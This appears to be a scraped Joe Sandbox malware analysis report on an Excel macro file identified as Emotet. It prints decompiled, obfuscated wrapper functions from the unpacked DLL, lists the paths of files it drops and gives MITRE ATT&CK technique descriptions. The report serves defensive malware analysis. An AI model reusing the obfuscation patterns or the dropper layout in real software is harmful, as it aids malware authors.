				signed int _v20;
				void* _t36;
				struct HINSTANCE__* _t47;
				signed int _t49;
				signed int _t50;
				WCHAR* _t57;

				_push(_a4);
				_t57 = __edx;
				_push(__edx);
				E10009E7D(_t36);
				_v20 = 0x4781cd;
				_t49 = 7;
				_v20 = _v20 / _t49;
				_v20 = _v20 ^ 0x0004a997;
				_v8 = 0x9f6121;
				_v8 = _v8 | 0x04abbfea;
				_v8 = _v8 ^ 0x44133d53;
				_v8 = _v8 ^ 0x40a32c45;
				_v16 = 0x791f5b;
				_t50 = 0x6e;
				_v16 = _v16 / _t50;
				_v16 = _v16 ^ 0x000d135a;
				_v12 = 0x90c5d0;
				_v12 = _v12 ^ 0x2cafc93f;
				_v12 = _v12 ^ 0x2c381e09;
				E1001BFF0(0xac802c42, 0x347, _t50, _t50, 0xede26741);
				_t47 = LoadLibraryW(_t57); // executed
				return _t47;
			}

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 1000FD58

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 47590214380f61eea0deedc725768216b1d7d9c616df5867df1b29833739390b
Instruction ID: 031dc55c3b1f58344b2c48e420bdd783e0c70cefa818c64ca28912174f1a3e10
Opcode Fuzzy Hash: 47590214380f61eea0deedc725768216b1d7d9c616df5867df1b29833739390b
Instruction Fuzzy Hash: A5112E75D00218EBDB18CFE5CC4A8EEBBB5EB44304F10819DE429A6251DBB56B148B91

Uniqueness

Uniqueness Score: -1.00%

Function 1001EFA0 Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1001EFA0(struct tagPROCESSENTRY32W __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t42;
				int _t49;
				struct tagPROCESSENTRY32W _t53;

				_push(_a12);
				_t53 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E10009E7D(_t42);
				_v24 = _v24 & 0x00000000;
				_v36 = 0x940446;
				_v32 = 0xc34eb2;
				_v28 = 0x41cca2;
				_v20 = 0xa62cc6;
				_v20 = _v20 >> 9;
				_v20 = _v20 ^ 0x000ba73f;
				_v16 = 0x814ffa;
				_v16 = _v16 << 8;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0x9ff36cb9;
				_v12 = 0x89ee57;
				_v12 = _v12 << 7;
				_v12 = _v12 ^ 0x8ea247f2;
				_v12 = _v12 ^ 0xca5d734f;
				_v8 = 0x3813ca;
				_v8 = _v8 << 0xa;
				_v8 = _v8 << 6;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x00028164;
				E1001BFF0(0xac802c42, 0x22c, __ecx, __ecx, 0xbfa2d5b5);
				_t49 = Process32NextW(_a8, _t53); // executed
				return _t49;
			}

0x1001efa7
0x1001efaa
0x1001efac
0x1001efaf
0x1001efb3
0x1001efb4
0x1001efb9
0x1001efc0
0x1001efc7
0x1001efce
0x1001efd5
0x1001efdc
0x1001efe0
0x1001efe7
0x1001efee
0x1001eff2
0x1001eff6
0x1001effd
0x1001f004
0x1001f008
0x1001f00f
0x1001f016
0x1001f01d
0x1001f021
0x1001f025
0x1001f029
0x1001f04d
0x1001f059
0x1001f05f

APIs

Process32NextW.KERNEL32(9FF36CB9,?,?,?,?,?,?,?,?,10013FAD,00000000), ref: 1001F059

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: NextProcess32
String ID:
API String ID: 1850201408-0
Opcode ID: 87839c01a8e811e3a0792bd5001239ee146142a7694fdb85628a3008ba55c99f
Instruction ID: 34d225cd4d15a628eda885c1cd7dcbad634c1f7ffe26debea36a215b9a68c6f4
Opcode Fuzzy Hash: 87839c01a8e811e3a0792bd5001239ee146142a7694fdb85628a3008ba55c99f
Instruction Fuzzy Hash: 3311D3B5C01218ABCF05DFE5D94A8EEBBB4FB04748F108098E92566210E7B45B58DF91

Uniqueness

Uniqueness Score: -1.00%

Function 10015C05 Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E10015C05(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t37;
				intOrPtr* _t45;
				void* _t46;
				signed int _t48;

				E10009E7D(_t37);
				_v12 = 0x505106;
				_v12 = _v12 + 0x51c;
				_v12 = _v12 + 0xfffffcf8;
				_v12 = _v12 ^ 0x00529723;
				_v8 = 0x63c3be;
				_v8 = _v8 + 0xffff4f78;
				_v8 = _v8 + 0x3bd7;
				_v8 = _v8 ^ 0x0063c0c8;
				_v20 = 0x7fc209;
				_t48 = 0x58;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00011db5;
				_v16 = 0xb39677;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0xe5981317;
				_t45 = E1001BFF0(0xac802c42, 0x27b, _t48, _t48, 0xdbc3c8a9);
				_t46 =  *_t45(_a12, __ecx, __edx, _a4, _a8, _a12); // executed
				return _t46;
			}

0x10015c16
0x10015c1b
0x10015c24
0x10015c2b
0x10015c32
0x10015c39
0x10015c40
0x10015c47
0x10015c4e
0x10015c55
0x10015c61
0x10015c67
0x10015c6a
0x10015c71
0x10015c78
0x10015c7c
0x10015ca0
0x10015cab
0x10015cb0

APIs

GetNativeSystemInfo.KERNEL32(00011DB5,?,?,?,?,?,?,?,?,60F9A52A), ref: 10015CAB

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 723d6b55b507fa3e9d6756dd822a7ac239c522e38c0bbdcc7da2d1e5eb62b593
Instruction ID: 7fe9c5b642daf9f31faaeaa7404cdedee4474a020d9dae3dc70c810494ab14b4
Opcode Fuzzy Hash: 723d6b55b507fa3e9d6756dd822a7ac239c522e38c0bbdcc7da2d1e5eb62b593
Instruction Fuzzy Hash: 58113376D1020CABDF04CFE4CC4A9EEBBB0FB04314F108588E92566290D7B59B149F90

Uniqueness

Uniqueness Score: -1.00%

Function 1001589F Relevance: 1.3, APIs: 1, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1001589F(void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t43;
				int _t54;
				signed int _t56;
				signed int _t57;

				_push(_a8);
				_push(_a4);
				E10009E7D(_t43);
				_v16 = 0xc64618;
				_t56 = 0x3f;
				_v16 = _v16 / _t56;
				_v16 = _v16 + 0xffff3e8c;
				_v16 = _v16 ^ 0x0002e0f6;
				_v12 = 0xd72ffe;
				_t57 = 0x65;
				_v12 = _v12 / _t57;
				_v12 = _v12 >> 0xe;
				_v12 = _v12 ^ 0x000919b9;
				_v8 = 0xbbe522;
				_v8 = _v8 | 0x01230c83;
				_v8 = _v8 + 0xfffffca7;
				_v8 = _v8 ^ 0x01b85404;
				_v20 = 0xe44986;
				_v20 = _v20 ^ 0x0c1cf8cb;
				_v20 = _v20 ^ 0x0cf5b088;
				E1001BFF0(0xac802c42, 0x1fb, _t57, _t57, 0xb4ac384c);
				_t54 = lstrcmpiW(_a8, _a4); // executed
				return _t54;
			}

0x100158a5
0x100158a8
0x100158ad
0x100158b2
0x100158c0
0x100158c5
0x100158ca
0x100158d1
0x100158d8
0x100158e2
0x100158e8
0x100158eb
0x100158ef
0x100158f6
0x100158fd
0x10015904
0x1001590b
0x10015912
0x10015919
0x10015920
0x10015944
0x10015952
0x10015957

APIs

lstrcmpiW.KERNEL32(0002E0F6,000919B9,?,?,?,?,?,?,?,1000625F), ref: 10015952

Memory Dump Source

Source File: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.694205312.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.694237056.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: 452565e4e7f37f6e49000b0532167b0047d4cfc205ca659c9ae6a073207a93f4
Instruction ID: 175f82cf19072a75a307ace2665e946683b912701b44e7c5cdbe9ca16398f08e
Opcode Fuzzy Hash: 452565e4e7f37f6e49000b0532167b0047d4cfc205ca659c9ae6a073207a93f4
Instruction Fuzzy Hash: 7A115B75E00208FBCF18DFE9D84A4EEBBB5FF40304F108198E9256A261D7B19B558F50

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report doc_82555.xlsm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ouyGhPOm[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2636759D.png

C:\Users\user\AppData\Local\Temp\CabE705.tmp

C:\Users\user\AppData\Local\Temp\TarE706.tmp

C:\Users\user\Desktop\~$doc_82555.xlsm

C:\Users\user\sei.ocx

C:\Windows\SysWOW64\Bvzagchljm\dwkzewjivpn.djh (copy)

Static File Info

General

File Icon

Static OLE Info

Windows Analysis Report
doc_82555.xlsm

Function 10011FD0 Relevance: 23.7, Strings: 18, Instructions: 1176
COMMONCrypto

Function 6DA3BAD0 Relevance: 18.5, APIs: 9, Strings: 1, Instructions: 985
COMMONLIBRARYCODE

Function 6DA2A720 Relevance: 10.4, APIs: 4, Instructions: 4424
COMMONLIBRARYCODE

Function 1001D14C Relevance: 10.3, Strings: 8, Instructions: 259
COMMONCrypto

Function 10004700 Relevance: 10.2, Strings: 8, Instructions: 218
COMMONCrypto

Function 10003511 Relevance: 9.1, Strings: 7, Instructions: 371
COMMONCrypto

Function 10006CBB Relevance: 9.0, Strings: 7, Instructions: 273
COMMONCrypto

Function 10010418 Relevance: 7.7, Strings: 6, Instructions: 236
COMMONCrypto

Function 1000D346 Relevance: 7.6, Strings: 6, Instructions: 114
COMMONCrypto

Function 1000BE09 Relevance: 6.5, Strings: 5, Instructions: 290
COMMONCrypto

Function 1002110E Relevance: 6.4, Strings: 5, Instructions: 182
COMMONCrypto

Function 1000E1A9 Relevance: 5.1, Strings: 4, Instructions: 63
COMMONCrypto

Function 100066B0 Relevance: 2.7, Strings: 2, Instructions: 210
COMMONCrypto

Function 100163F0 Relevance: 2.7, Strings: 2, Instructions: 180
COMMONCrypto

Function 1000F1D5 Relevance: 1.6, APIs: 1, Instructions: 69
COMMONCrypto

Function 1001EAA3 Relevance: 1.3, Strings: 1, Instructions: 61
COMMONCrypto

Function 100109F9 Relevance: .1, Instructions: 73
COMMONCrypto

Function 6DA4A1FC Relevance: 15.1, APIs: 10, Instructions: 106
memoryCOMMONLIBRARYCODE

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre